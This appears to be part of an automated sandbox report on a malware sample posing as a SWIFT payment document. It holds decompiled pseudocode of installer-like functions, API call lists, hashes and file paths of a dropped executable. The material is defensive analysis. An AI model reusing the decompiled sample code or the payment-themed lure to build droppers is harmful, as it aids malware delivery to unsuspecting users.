                                                                                  0x00401ea5
                                                                                  0x00401eac
                                                                                  0x00401ebe
                                                                                  0x00401ec4
                                                                                  0x00401ec9
                                                                                  0x00401ed3
                                                                                  0x00402638
                                                                                  0x0040156d
                                                                                  0x00402ba4
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • GetDC.USER32(?), ref: 00401E51
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                  • ReleaseDC.USER32 ref: 00401E84
                                                                                    • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                    • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                  • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2584051700-0
                                                                                  • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                  • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                                  • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                  • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 59%
                                                                                  			E00401C43(intOrPtr __edx) {
                                                                                  				int _t29;
                                                                                  				long _t30;
                                                                                  				signed int _t32;
                                                                                  				WCHAR* _t35;
                                                                                  				long _t36;
                                                                                  				int _t41;
                                                                                  				signed int _t42;
                                                                                  				int _t46;
                                                                                  				int _t56;
                                                                                  				intOrPtr _t57;
                                                                                  				struct HWND__* _t63;
                                                                                  				void* _t64;
                                                                                  
                                                                                  				_t57 = __edx;
                                                                                  				_t29 = E00402D84(3);
                                                                                  				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                  				 *(_t64 - 0x18) = _t29;
                                                                                  				_t30 = E00402D84(4);
                                                                                  				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                  				 *(_t64 + 8) = _t30;
                                                                                  				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                                                  					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                                                  				}
                                                                                  				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                                                  				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                                                  					 *(_t64 + 8) = E00402DA6(0x44);
                                                                                  				}
                                                                                  				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                                                  				_push(1);
                                                                                  				if(__eflags != 0) {
                                                                                  					_t61 = E00402DA6();
                                                                                  					_t32 = E00402DA6();
                                                                                  					asm("sbb ecx, ecx");
                                                                                  					asm("sbb eax, eax");
                                                                                  					_t35 =  ~( *_t31) & _t61;
                                                                                  					__eflags = _t35;
                                                                                  					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                  					goto L10;
                                                                                  				} else {
                                                                                  					_t63 = E00402D84();
                                                                                  					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                  					_t41 = E00402D84(2);
                                                                                  					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                  					_t56 =  *(_t64 - 0x1c) >> 2;
                                                                                  					if(__eflags == 0) {
                                                                                  						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                                                  						L10:
                                                                                  						 *(_t64 - 0x38) = _t36;
                                                                                  					} else {
                                                                                  						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                                                  						asm("sbb eax, eax");
                                                                                  						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                  					}
                                                                                  				}
                                                                                  				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                                                  				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                                                  					_push( *(_t64 - 0x38));
                                                                                  					E004065AF();
                                                                                  				}
                                                                                  				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                                                                                  				return 0;
                                                                                  			}















                                                                                  0x00401c43
                                                                                  0x00401c45
                                                                                  0x00401c4c
                                                                                  0x00401c4f
                                                                                  0x00401c52
                                                                                  0x00401c5c
                                                                                  0x00401c60
                                                                                  0x00401c63
                                                                                  0x00401c6c
                                                                                  0x00401c6c
                                                                                  0x00401c6f
                                                                                  0x00401c73
                                                                                  0x00401c7c
                                                                                  0x00401c7c
                                                                                  0x00401c7f
                                                                                  0x00401c83
                                                                                  0x00401c85
                                                                                  0x00401cda
                                                                                  0x00401cdc
                                                                                  0x00401ce7
                                                                                  0x00401cf1
                                                                                  0x00401cf4
                                                                                  0x00401cf4
                                                                                  0x00401cfd
                                                                                  0x00000000
                                                                                  0x00401c87
                                                                                  0x00401c8e
                                                                                  0x00401c90
                                                                                  0x00401c93
                                                                                  0x00401c99
                                                                                  0x00401ca0
                                                                                  0x00401ca3
                                                                                  0x00401ccb
                                                                                  0x00401d03
                                                                                  0x00401d03
                                                                                  0x00401ca5
                                                                                  0x00401cb3
                                                                                  0x00401cbb
                                                                                  0x00401cbe
                                                                                  0x00401cbe
                                                                                  0x00401ca3
                                                                                  0x00401d06
                                                                                  0x00401d09
                                                                                  0x00401d0f
                                                                                  0x00402ba4
                                                                                  0x00402ba4
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Timeout
                                                                                  • String ID: !
                                                                                  • API String ID: 1777923405-2657877971
                                                                                  • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                  • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                                                  • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                  • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 91%
                                                                                  			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                                  				int _v8;
                                                                                  				long _t21;
                                                                                  				long _t24;
                                                                                  				char* _t30;
                                                                                  
                                                                                  				asm("sbb eax, eax");
                                                                                  				_v8 = 0x800;
                                                                                  				_t5 =  &_a4; // 0x422728
                                                                                  				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                                  				_t30 = _a16;
                                                                                  				if(_t21 != 0) {
                                                                                  					L4:
                                                                                  					 *_t30 =  *_t30 & 0x00000000;
                                                                                  				} else {
                                                                                  					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                                  					_t21 = RegCloseKey(_a20);
                                                                                  					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                                  					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                  						goto L4;
                                                                                  					}
                                                                                  				}
                                                                                  				return _t21;
                                                                                  			}







                                                                                  0x00406544
                                                                                  0x00406546
                                                                                  0x0040655b
                                                                                  0x0040655e
                                                                                  0x00406563
                                                                                  0x00406568
                                                                                  0x004065a6
                                                                                  0x004065a6
                                                                                  0x0040656a
                                                                                  0x0040657c
                                                                                  0x00406587
                                                                                  0x0040658d
                                                                                  0x00406598
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406598
                                                                                  0x004065ac

                                                                                  APIs
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,?,?,0040679D,80000002), ref: 0040657C
                                                                                  • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000000,00422728), ref: 00406587
                                                                                  Strings
                                                                                  • ('B, xrefs: 0040655B
                                                                                  • "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v, xrefs: 0040653D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue
                                                                                  • String ID: "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v$('B
                                                                                  • API String ID: 3356406503-4237221478
                                                                                  • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                  • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                                  • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                  • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 58%
                                                                                  			E00405F37(WCHAR* _a4) {
                                                                                  				WCHAR* _t9;
                                                                                  
                                                                                  				_t9 = _a4;
                                                                                  				_push( &(_t9[lstrlenW(_t9)]));
                                                                                  				_push(_t9);
                                                                                  				if( *(CharPrevW()) != 0x5c) {
                                                                                  					lstrcatW(_t9, 0x40a014);
                                                                                  				}
                                                                                  				return _t9;
                                                                                  			}




                                                                                  0x00405f38
                                                                                  0x00405f45
                                                                                  0x00405f46
                                                                                  0x00405f51
                                                                                  0x00405f59
                                                                                  0x00405f59
                                                                                  0x00405f61

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 2659869361-3936084776
                                                                                  • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                  • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                                                  • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                  • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 89%
                                                                                  			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                  				int _t15;
                                                                                  				long _t16;
                                                                                  
                                                                                  				_t15 = _a8;
                                                                                  				if(_t15 != 0x102) {
                                                                                  					if(_t15 != 0x200) {
                                                                                  						_t16 = _a16;
                                                                                  						L7:
                                                                                  						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                                                                                  							_push(_t16);
                                                                                  							_push(6);
                                                                                  							 *0x423734 = _t16;
                                                                                  							E00404FFF();
                                                                                  						}
                                                                                  						L11:
                                                                                  						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                                                                                  					}
                                                                                  					if(IsWindowVisible(_a4) == 0) {
                                                                                  						L10:
                                                                                  						_t16 = _a16;
                                                                                  						goto L11;
                                                                                  					}
                                                                                  					_t16 = E00404F7F(_a4, 1);
                                                                                  					_t15 = 0x419;
                                                                                  					goto L7;
                                                                                  				}
                                                                                  				if(_a12 != 0x20) {
                                                                                  					goto L10;
                                                                                  				}
                                                                                  				E00404610(0x413);
                                                                                  				return 0;
                                                                                  			}





                                                                                  0x00405642
                                                                                  0x0040564c
                                                                                  0x00405668
                                                                                  0x0040568a
                                                                                  0x0040568d
                                                                                  0x00405693
                                                                                  0x0040569d
                                                                                  0x0040569e
                                                                                  0x004056a0
                                                                                  0x004056a6
                                                                                  0x004056a6
                                                                                  0x004056b0
                                                                                  0x00000000
                                                                                  0x004056be
                                                                                  0x00405675
                                                                                  0x004056ad
                                                                                  0x004056ad
                                                                                  0x00000000
                                                                                  0x004056ad
                                                                                  0x00405681
                                                                                  0x00405683
                                                                                  0x00000000
                                                                                  0x00405683
                                                                                  0x00405652
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405659
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • IsWindowVisible.USER32 ref: 0040566D
                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                                    • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                  • String ID:
                                                                                  • API String ID: 3748168415-3916222277
                                                                                  • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                  • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                                  • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                  • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 77%
                                                                                  			E00405F83(WCHAR* _a4) {
                                                                                  				WCHAR* _t5;
                                                                                  				WCHAR* _t7;
                                                                                  
                                                                                  				_t7 = _a4;
                                                                                  				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                                                  				while( *_t5 != 0x5c) {
                                                                                  					_push(_t5);
                                                                                  					_push(_t7);
                                                                                  					_t5 = CharPrevW();
                                                                                  					if(_t5 > _t7) {
                                                                                  						continue;
                                                                                  					}
                                                                                  					break;
                                                                                  				}
                                                                                  				 *_t5 =  *_t5 & 0x00000000;
                                                                                  				return  &(_t5[1]);
                                                                                  			}





                                                                                  0x00405f84
                                                                                  0x00405f8e
                                                                                  0x00405f91
                                                                                  0x00405f97
                                                                                  0x00405f98
                                                                                  0x00405f99
                                                                                  0x00405fa1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405fa1
                                                                                  0x00405fa3
                                                                                  0x00405fab

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\AppData\Roaming,0040313C,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,80000000,00000003), ref: 00405F89
                                                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Roaming,0040313C,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,80000000,00000003), ref: 00405F99
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Roaming, xrefs: 00405F83
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharPrevlstrlen
                                                                                  • String ID: C:\Users\user\AppData\Roaming
                                                                                  • API String ID: 2709904686-2190460797
                                                                                  • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                  • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                                                  • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                  • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                  				int _v8;
                                                                                  				int _t12;
                                                                                  				int _t14;
                                                                                  				int _t15;
                                                                                  				CHAR* _t17;
                                                                                  				CHAR* _t27;
                                                                                  
                                                                                  				_t12 = lstrlenA(_a8);
                                                                                  				_t27 = _a4;
                                                                                  				_v8 = _t12;
                                                                                  				while(lstrlenA(_t27) >= _v8) {
                                                                                  					_t14 = _v8;
                                                                                  					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                  					_t15 = lstrcmpiA(_t27, _a8);
                                                                                  					_t27[_v8] =  *(_t14 + _t27);
                                                                                  					if(_t15 == 0) {
                                                                                  						_t17 = _t27;
                                                                                  					} else {
                                                                                  						_t27 = CharNextA(_t27);
                                                                                  						continue;
                                                                                  					}
                                                                                  					L5:
                                                                                  					return _t17;
                                                                                  				}
                                                                                  				_t17 = 0;
                                                                                  				goto L5;
                                                                                  			}









                                                                                  0x004060cd
                                                                                  0x004060cf
                                                                                  0x004060d2
                                                                                  0x004060fe
                                                                                  0x004060d7
                                                                                  0x004060e0
                                                                                  0x004060e5
                                                                                  0x004060f0
                                                                                  0x004060f3
                                                                                  0x0040610f
                                                                                  0x004060f5
                                                                                  0x004060fc
                                                                                  0x00000000
                                                                                  0x004060fc
                                                                                  0x00406108
                                                                                  0x0040610c
                                                                                  0x0040610c
                                                                                  0x00406106
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                                                  • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 190613189-0
                                                                                  • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                  • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                                  • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                  • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:16.8%
                                                                                  Dynamic/Decrypted Code Coverage:8.3%
                                                                                  Signature Coverage:6.7%
                                                                                  Total number of Nodes:1565
                                                                                  Total number of Limit Nodes:27
